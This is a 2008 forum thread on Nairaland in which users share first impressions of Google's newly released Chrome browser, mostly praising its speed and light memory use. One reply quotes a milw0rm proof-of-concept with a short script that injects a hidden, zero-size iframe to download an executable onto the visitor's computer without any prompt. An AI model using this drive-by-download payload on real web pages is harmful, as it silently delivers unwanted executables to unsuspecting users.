Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,150,696 members, 7,809,624 topics. Date: Friday, 26 April 2024 at 12:07 PM

What do you think of Google's new Web Browser("chrome") ? - Webmasters - Nairaland

Nairaland Forum / Science/Technology / Webmasters / What do you think of Google's new Web Browser("chrome") ? (686 Views)

15 Years Of Google At A Glance!!!! / The Fastest Web-browser For Slow Internet Connections / Guideline/Roadmap For New Web Designers (Contains Detailed Description) (2) (3) (4)

(1) (Reply) (Go Down)

What do you think of Google's new Web Browser("chrome") ? by ThePhantom(m): 1:38am On Sep 03, 2008
Just downloaded the new web browser and so far I like it. Test it out let us know what you think
Re: What do you think of Google's new Web Browser("chrome") ? by yawatide(f): 4:00am On Sep 03, 2008
Re: What do you think of Google's new Web Browser("chrome") ? by xeroxspy1: 7:26am On Sep 04, 2008
Chk ds out 1st, Ref- milw0rm<dot>com, Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. This proof-of-concept was created for educational purposes only. Use the code it at your own risk. The author will not be responsible for any damages. Tested on Windows Vista SP1and Windows XP SP3 with Google Chrome (BETA) ************************************************************************** <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
Re: What do you think of Google's new Web Browser("chrome") ? by nduaj(m): 2:04pm On Sep 04, 2008
I like the browser, so far its been fast, hasnt hung my system, and compared to the others (Firefox and Explorere), it takes less of my RAM space. so far so good, i like it, but i still dey check am out.
Re: What do you think of Google's new Web Browser("chrome") ? by syskay(m): 3:49pm On Sep 04, 2008
Google Chrome is probably the niftiest Browser in the market right now. However, its limited features makes it somewhat lightweight when compared to Firefox 3 and Explorer 8.
Re: What do you think of Google's new Web Browser("chrome") ? by justbones(m): 5:28pm On Sep 04, 2008
Its like totally cool and stuff
Re: What do you think of Google's new Web Browser("chrome") ? by quadrillio(m): 1:19pm On Sep 05, 2008
I am using it right now

What I love most about it is the fact that is the use of FLAT graphics for the design

(1) (Reply)

Hello Everyone, And One Thing On Start: / A Professional Website Designer/programmer Wanted Urgently In Port Harcourt / 3-hot Articles For Sale To Just 15 People Only And I Will Never Sell It Again

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 9
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.